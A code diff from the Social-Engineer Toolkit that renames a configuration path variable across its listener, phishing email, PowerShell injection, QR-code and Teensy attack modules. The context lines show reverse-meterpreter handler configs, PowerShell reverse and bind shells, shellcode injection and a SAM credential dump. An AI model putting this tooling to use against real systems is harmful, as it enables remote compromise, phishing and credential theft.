# if we have multi injection on, don't worry about these # if we have multi injection on, don't worry about these
if multi_injection != "on": if multi_injection != "on":
if pyinjection == "off": if pyinjection == "off":
@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
["4"], "Enter the port for Metasploit to listen on for powershell [443]")) ["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": if port == "":
port = "443" port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
data = fileopen.read() data = fileopen.read()
match = re.search(port, data) match = re.search(port, data)
if not match: if not match:
filewrite = open( filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a") "%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
if multi_injection != "on": if multi_injection != "on":
if pyinjection == "off": if pyinjection == "off":
# check to see if the meta config multi pyinjector is there # check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
if check_options("PORT=") != 0: if check_options("PORT=") != 0:
port = check_options("PORT=") port = check_options("PORT=")
# if port.options isnt there then prompt # if port.options isnt there then prompt
@ -128,12 +128,12 @@ if multi_injection == "on":
generate_powershell_alphanumeric_payload( generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86) powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
port_check = check_ports( port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports) "%s/meta_config_multipyinjector" % (userconfigpath), ports)
if port_check == False: if port_check == False:
filewrite = open( filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a") "%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -143,15 +143,15 @@ if multi_injection == "on":
filewrite.close() filewrite.close()
# if we aren't using multi pyinjector # if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if meta config isn't created yet then create it # if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)): if not os.path.isfile("%s/meta_config" % (userconfigpath)):
filewrite = open("%s/meta_config" % (setdir), "w") filewrite = open("%s/meta_config" % (userconfigpath), "w")
filewrite.write("") filewrite.write("")
filewrite.close() filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports) port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
if port_check == False: if port_check == False:
filewrite = open("%s/meta_config" % (setdir), "a") filewrite = open("%s/meta_config" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -164,7 +164,7 @@ if multi_injection == "on":
if pyinjection == "on": if pyinjection == "on":
multi_injection_x86 = "" multi_injection_x86 = ""
# read in the file we need for parsing # read in the file we need for parsing
fileopen = open(setdir + "/payload_options.shellcode", "r") fileopen = open(userconfigpath + "payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",") payloads = payloads.split(",")
# format: payload<space>port # format: payload<space>port
@ -196,7 +196,7 @@ if verbose.lower() == "on":
time.sleep(3) time.sleep(3)
print(x86) print(x86)
filewrite = open("%s/x86.powershell" % (setdir), "w") filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
print_status("Finished generating powershell injection bypass.") print_status("Finished generating powershell injection bypass.")

48
src/payloads/set_payloads/listener.py
View file

@ -17,10 +17,10 @@ definepath = os.getcwd()
sys.path.append(definepath) sys.path.append(definepath)
# cleanup # cleanup
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
os.remove(setdir + "/system.address") os.remove(userconfigpath + "system.address")
# will remove this later # will remove this later
core_modules = True core_modules = True
@ -863,9 +863,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
time.sleep(0.5) time.sleep(0.5)
# write out system # write out system
if os.path.isfile("%s/system.address" % (setdir)): if os.path.isfile("%s/system.address" % (userconfigpath)):
os.remove("%s/system.address" % (setdir)) os.remove("%s/system.address" % (userconfigpath))
filewrite = open("%s/system.address" % (setdir), "w") filewrite = open("%s/system.address" % (userconfigpath), "w")
filewrite.write(addr) filewrite.write(addr)
filewrite.close() filewrite.close()
@ -882,9 +882,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# had to do some funky stuff here because global vars are not working properly # had to do some funky stuff here because global vars are not working properly
# inside threads, so the information cant be passed to # inside threads, so the information cant be passed to
# normal outside routines # normal outside routines
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
filewrite = open(setdir + "/uac.address", "w") filewrite = open(userconfigpath + "uac.address", "w")
filewrite.write(addr) filewrite.write(addr)
filewrite.close() filewrite.close()
@ -1033,9 +1033,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
if os.path.isfile("src/payloads/set_payloads/persistence.binary"): if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
if core_modules == True: if core_modules == True:
subprocess.Popen( subprocess.Popen(
"cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait() "cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
upx("%s/persistence.binary" % (setdir)) upx("%s/persistence.binary" % (userconfigpath))
upload = "%s/persistence.binary" % (setdir) upload = "%s/persistence.binary" % (userconfigpath)
if core_modules == False: if core_modules == False:
upload = "src/payloads/set_payloads/persistence.binary" upload = "src/payloads/set_payloads/persistence.binary"
@ -1085,9 +1085,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
if os.path.isfile("src/payloads/set_payloads/shell.windows"): if os.path.isfile("src/payloads/set_payloads/shell.windows"):
if core_modules == True: if core_modules == True:
subprocess.Popen( subprocess.Popen(
"cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait() "cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
upx(setdir + "/shell.windows") upx(userconfigpath + "shell.windows")
upload = setdir + "/shell.windows" upload = userconfigpath + "shell.windows"
if core_modules == False: if core_modules == False:
upload = "src/payloads/set_payloads/shell.windows" upload = "src/payloads/set_payloads/shell.windows"
@ -1437,8 +1437,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# if we have a windows shell # if we have a windows shell
if data == "IHAYYYYYIAMSETANDIAMWINDOWS": if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
fileopen = open(setdir + "/system.address", "r") fileopen = open(userconfigpath + "system.address", "r")
system = fileopen.read().rstrip() system = fileopen.read().rstrip()
system = system.replace(":WINDOWS", "") system = system.replace(":WINDOWS", "")
system = system.replace(":UAC-SAFE", "") system = system.replace(":UAC-SAFE", "")
@ -1446,8 +1446,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM") temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
bypass_counter = 1 bypass_counter = 1
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
fileopen = open(setdir + "/uac.address", "r") fileopen = open(userconfigpath + "uac.address", "r")
uac = fileopen.read().rstrip() uac = fileopen.read().rstrip()
uac = uac.replace(":WINDOWS", "") uac = uac.replace(":WINDOWS", "")
if str(addr[0]) == str(uac): if str(addr[0]) == str(uac):
@ -1479,12 +1479,12 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# reset value # reset value
# if uac != None: # if uac != None:
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
bypass_counter = 0 bypass_counter = 0
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
os.remove(setdir + "/system.address") os.remove(userconfigpath + "system.address")
bypass_counter = 0 bypass_counter = 0
if addr[0] != "127.0.0.1": if addr[0] != "127.0.0.1":

76
src/phishing/smtp/client/smtp_client.py
View file

@ -109,41 +109,41 @@ print_info(
"As an added bonus, use the file-format creator in SET to create your attachment.") "As an added bonus, use the file-format creator in SET to create your attachment.")
counter = 0 counter = 0
# PDF Previous # PDF Previous
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
if os.path.isfile(setdir + "/template.rar"): if os.path.isfile(userconfigpath + "template.rar"):
if os.path.isfile(setdir + "/template.zip"): if os.path.isfile(userconfigpath + "template.zip"):
print_warning("Multiple payloads were detected:") print_warning("Multiple payloads were detected:")
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n") print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
choose_payload = input(setprompt("0", "")) choose_payload = input(setprompt("0", ""))
if choose_payload == '1': if choose_payload == '1':
file_format = (setdir + "/template.pdf") file_format = (userconfigpath + "template.pdf")
if choose_payload == '2': if choose_payload == '2':
file_format = (setdir + "/template.rar") file_format = (userconfigpath + "template.rar")
if choose_payload == '3': if choose_payload == '3':
file_format = (setdir + "/template.zip") file_format = (userconfigpath + "template.zip")
counter = 1 counter = 1
if counter == 0: if counter == 0:
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
file_format = (setdir + "/template.pdf") file_format = (userconfigpath + "template.pdf")
if os.path.isfile(setdir + "/template.rar"): if os.path.isfile(userconfigpath + "template.rar"):
file_format = (setdir + "/template.rar") file_format = (userconfigpath + "template.rar")
if os.path.isfile(setdir + "/template.zip"): if os.path.isfile(userconfigpath + "template.zip"):
file_format = (setdir + "/template.zip") file_format = (userconfigpath + "template.zip")
if os.path.isfile(setdir + "/template.doc"): if os.path.isfile(userconfigpath + "template.doc"):
file_format = (setdir + "/template.doc") file_format = (userconfigpath + "template.doc")
if os.path.isfile(setdir + "/template.rtf"): if os.path.isfile(userconfigpath + "template.rtf"):
file_format = (setdir + "/template.rtf") file_format = (userconfigpath + "template.rtf")
if os.path.isfile(setdir + "/template.mov"): if os.path.isfile(userconfigpath + "template.mov"):
file_format = (setdir + "/template.mov") file_format = (userconfigpath + "template.mov")
# Determine if prior payload created # Determine if prior payload created
if not os.path.isfile(setdir + "/template.pdf"): if not os.path.isfile(userconfigpath + "template.pdf"):
if not os.path.isfile(setdir + "/template.rar"): if not os.path.isfile(userconfigpath + "template.rar"):
if not os.path.isfile(setdir + "/template.zip"): if not os.path.isfile(userconfigpath + "template.zip"):
if not os.path.isfile(setdir + "/template.doc"): if not os.path.isfile(userconfigpath + "template.doc"):
if not os.path.isfile(setdir + "/template.rtf"): if not os.path.isfile(userconfigpath + "template.rtf"):
if not os.path.isfile(setdir + "/template.mov"): if not os.path.isfile(userconfigpath + "template.mov"):
print("No previous payload created.") print("No previous payload created.")
file_format = input( file_format = input(
setprompt(["1"], "Enter the file to use as an attachment")) setprompt(["1"], "Enter the file to use as an attachment"))
@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '':
if filename1 == '2': if filename1 == '2':
filename1 = input(setprompt(["1"], "New filename")) filename1 = input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
(file_format, setdir, filename1), shell=True).wait() (file_format, userconfigpath, filename1), shell=True).wait()
file_format = ("%s/%s" % (setdir, filename1)) file_format = ("%s/%s" % (userconfigpath, filename1))
print_status("Filename changed, moving on...") print_status("Filename changed, moving on...")
print (""" print ("""
@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2':
if template_choice == '1': if template_choice == '1':
# set path for # set path for
path = 'src/templates/' path = 'src/templates/'
filewrite = open(setdir + "/email.templates", "w") filewrite = open(userconfigpath + "email.templates", "w")
counter = 0 counter = 0
# Pull all files in the templates directory # Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')): for infile in glob.glob(os.path.join(path, '*.template')):
@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2':
# close the file # close the file
filewrite.close() filewrite.close()
# read in formatted filenames # read in formatted filenames
fileread = open(setdir + "/email.templates", "r").readlines() fileread = open(userconfigpath + "email.templates", "r").readlines()
print_info("Available templates:") print_info("Available templates:")
for line in fileread: for line in fileread:
line = line.rstrip() line = line.rstrip()
@ -459,31 +459,31 @@ if option1 == '2':
email_num = email_num + 1 email_num = email_num + 1
print(" Sent e-mail number: " + (str(email_num))) print(" Sent e-mail number: " + (str(email_num)))
if not os.path.isfile(setdir + "/template.zip"): if not os.path.isfile(userconfigpath + "template.zip"):
print_status("SET has finished delivering the emails") print_status("SET has finished delivering the emails")
question1 = yesno_prompt(["1"], "Setup a listener [yes|no]") question1 = yesno_prompt(["1"], "Setup a listener [yes|no]")
if question1 == 'YES': if question1 == 'YES':
if not os.path.isfile(setdir + "/payload.options"): if not os.path.isfile(userconfigpath + "payload.options"):
if not os.path.isfile(setdir + "/meta_config"): if not os.path.isfile(userconfigpath + "meta_config"):
if not os.path.isfile(setdir + "/unc_config"): if not os.path.isfile(userconfigpath + "unc_config"):
print_error( print_error(
"Sorry, you did not generate your payload through SET, this option is not supported.") "Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"): if os.path.isfile(userconfigpath + "unc_config"):
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/unc_config" % (meta_path, setdir)) "%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath))
try: try:
child.interact() child.interact()
except Exception: except Exception:
child.close() child.close()
if os.path.isfile(setdir + "/payload.options"): if os.path.isfile(userconfigpath + "payload.options"):
fileopen = open(setdir + "/payload.options", "r").readlines() fileopen = open(userconfigpath + "payload.options", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
line = line.split(" ") line = line.split(" ")
# CREATE THE LISTENER HERE # CREATE THE LISTENER HERE
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use exploit/multi/handler\n") filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + line[0] + "\n") filewrite.write("set PAYLOAD " + line[0] + "\n")
filewrite.write("set LHOST " + line[1] + "\n") filewrite.write("set LHOST " + line[1] + "\n")
@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"):
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
filewrite.close() filewrite.close()
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/meta_config" % (meta_path, setdir)) "%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath))
try: try:
child.interact() child.interact()
except Exception: except Exception:

42
src/powershell/powershell.py
View file

@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: with open(core.userconfigpath + "payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_https {},".format(port)) filewrite.write("windows/meterpreter/reverse_https {},".format(port))
try: try:
@ -51,15 +51,15 @@ if powershell_menu_choice != "99":
#prep_powershell_payload() #prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
# here we format everything for us # here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen: with open(core.userconfigpath + "x86.powershell") as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)
choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
@ -68,7 +68,7 @@ if powershell_menu_choice != "99":
# if we want to start the listener # if we want to start the listener
if choice == 'YES': if choice == 'YES':
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n" "set LPORT {0}\n"
@ -78,10 +78,10 @@ if powershell_menu_choice != "99":
msf_path = core.meta_path() msf_path = core.meta_path()
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("Powershell files can be found under {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.return_continue() core.return_continue()
# if we select powershell reverse shell # if we select powershell reverse shell
@ -98,11 +98,11 @@ if powershell_menu_choice != "99":
data = fileopen.read() data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr) data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port) data = data.replace("PORTHERE", port)
core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.setdir + "/reports/powershell/powershell.reverse.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.reverse.txt", "w") as filewrite:
filewrite.write(data) filewrite.write(data)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]")
@ -123,22 +123,22 @@ if powershell_menu_choice != "99":
data = fileopen.read() data = fileopen.read()
data = data.replace("PORTHERE", port) data = data.replace("PORTHERE", port)
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.setdir + "/reports/powershell/powershell.bind.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.bind.txt", "w") as filewrite:
filewrite.write(data) filewrite.write(data)
core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
core.return_continue() core.return_continue()
# if we select powershell powerdump SAM dump # if we select powershell powerdump SAM dump
if powershell_menu_choice == "4": if powershell_menu_choice == "4":
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
# copy file # copy file
if os.path.isfile("src/powershell/powerdump.encoded"): if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", core.setdir + "/reports/powershell/powerdump.encoded.txt") shutil.copyfile("src/powershell/powerdump.encoded", core.userconfigpath + "reports/powershell/powerdump.encoded.txt")
core.print_status("The powershell program has been exported to {}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("The powershell program has been exported to {}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.") core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
core.return_continue() core.return_continue()

2
src/qrcode/qrgenerator.py
View file

@ -16,7 +16,7 @@ def gen_qrcode(url):
im = qr.make_image() im = qr.make_image()
time.sleep(1) time.sleep(1)
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png") qr_img_path = os.path.join(core.userconfigpath, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path): if os.path.isfile(qr_img_path):
os.remove(qr_img_path) os.remove(qr_img_path)

14
src/teensy/binary2teensy.py
View file

@ -308,24 +308,24 @@ Keyboard.send_now();
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs)) }""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
# delete temporary file # delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait() subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports") if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports")
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir)) print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath))
# write the teensy.ino file out # write the teensy.ino file out
filewrite = file(setdir + "reports/binary2teensy.ino", "w") filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w")
# write the teensy.ino file out # write the teensy.ino file out
filewrite.write(output_variable) filewrite.write(output_variable)
# close the file # close the file
filewrite.close() filewrite.close()
print_status("Generating a listener...") print_status("Generating a listener...")
# create our metasploit answer file # create our metasploit answer file
filewrite = file(setdir + "answer.txt", "w") filewrite = file(userconfigpath + "answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url)) filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
filewrite.close() filewrite.close()
# spawn a multi/handler listener # spawn a multi/handler listener
subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait() subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait()
print_status("[*] Housekeeping old files...") print_status("[*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it # if our answer file is still there (which it should be), then remove it
if os.path.isfile(setdir + "answer.txt"): if os.path.isfile(userconfigpath + "answer.txt"):
# remove the old file, no longer used once we've exited # remove the old file, no longer used once we've exited
subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait() subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait()

16
src/teensy/powershell_shellcode.py
View file

@ -25,18 +25,18 @@ if payload == '':
payload = 'windows/meterpreter/reverse_http' payload = 'windows/meterpreter/reverse_http'
# create base metasploit payload to pass to powershell.prep # create base metasploit payload to pass to powershell.prep
with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload) filewrite.write(payload)
ipaddr = input("Enter the IP of the LHOST: ") ipaddr = input("Enter the IP of the LHOST: ")
port = input("Enter the port for the LHOST: ") port = input("Enter the port for the LHOST: ")
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir + 'x86.powershell'), 'w') as filewrite: with open(os.path.join(core.userconfigpath, 'x86.powershell'), 'w') as filewrite:
filewrite.write(shellcode) filewrite.write(shellcode)
time.sleep(3) time.sleep(3)
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: with open(os.path.join(core.userconfigpath, "x86.powershell")) as fileopen:
pass pass
# read in x amount of bytes # read in x amount of bytes
data_read = int(50) data_read = int(50)
@ -153,9 +153,9 @@ Keyboard.send_now();
print("[*] Payload has been extracted. Copying file to root directory under reports/teensy.ino") print("[*] Payload has been extracted. Copying file to root directory under reports/teensy.ino")
if not os.path.isdir(os.path.join(core.setdir + "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir + "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "reports/teensy.ino"), "w") as filewrite:
filewrite.write(teensy) filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ")
if choice == "YES": if choice == "YES":
@ -173,7 +173,7 @@ if choice == "YES":
else: else:
port = input("Enter the port to connect back on: ") port = input("Enter the port to connect back on: ")
with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "metasploit.answers"), "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -184,7 +184,7 @@ if choice == "YES":
print("[*] Launching Metasploit....") print("[*] Launching Metasploit....")
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "metasploit.answers"))) os.path.join(core.userconfigpath, "metasploit.answers")))
child.interact() child.interact()
except: except:
pass pass

22
src/teensy/teensy.py
View file

@ -29,9 +29,9 @@ now = datetime.datetime.today()
if operating_system != "windows": if operating_system != "windows":
import pexpect import pexpect
# check to see if setdir is created # check to see if userconfigpath is created
if not os.path.isdir(os.path.join(core.setdir + "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir + "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
definepath = os.getcwd() definepath = os.getcwd()
# define if use apache or not # define if use apache or not
@ -57,7 +57,7 @@ for line in apache_check:
# grab info from config file # grab info from config file
with open(os.path.join(core.setdir + "teensy")) as fileopen: with open(os.path.join(core.userconfigpath, "teensy")) as fileopen:
counter = 0 counter = 0
payload_counter = 0 payload_counter = 0
choice = None choice = None
@ -77,14 +77,14 @@ with open(os.path.join(core.setdir + "teensy")) as fileopen:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr) core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir + "teensy")): if not os.path.isfile(os.path.join(core.userconfigpath, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set() core.exit_set()
def writefile(filename, now): def writefile(filename, now):
with open(os.path.join("src/teensy/" + filename)) as fileopen, \ with open(os.path.join("src/teensy/" + filename)) as fileopen, \
open(os.path.join(core.setdir + "/reports/teensy_{0}.ino".format(now)), "w") as filewrite: open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite:
for line in fileopen: for line in fileopen:
match = re.search("IPADDR", line) match = re.search("IPADDR", line)
@ -128,7 +128,7 @@ if choice == "13":
# save our stuff here # save our stuff here
print(core.bcolors.BLUE + print(core.bcolors.BLUE +
"\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.setdir + "\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.userconfigpath,
"reports" + "reports" +
"teensy_{0}.ino".format(now))) + "teensy_{0}.ino".format(now))) +
core.bcolors.ENDC) core.bcolors.ENDC)
@ -142,8 +142,8 @@ print(core.bcolors.RED +
pause = input("Press {return} to continue.") pause = input("Press {return} to continue.")
if payload_counter == 1: if payload_counter == 1:
webclone_path = os.path.join(core.setdir + "web_clone") webclone_path = os.path.join(core.userconfigpath, "web_clone")
metasploit_exec_path = os.path.join(core.setdir + "msf.exe") metasploit_exec_path = os.path.join(core.userconfigpath, "msf.exe")
if not apache: if not apache:
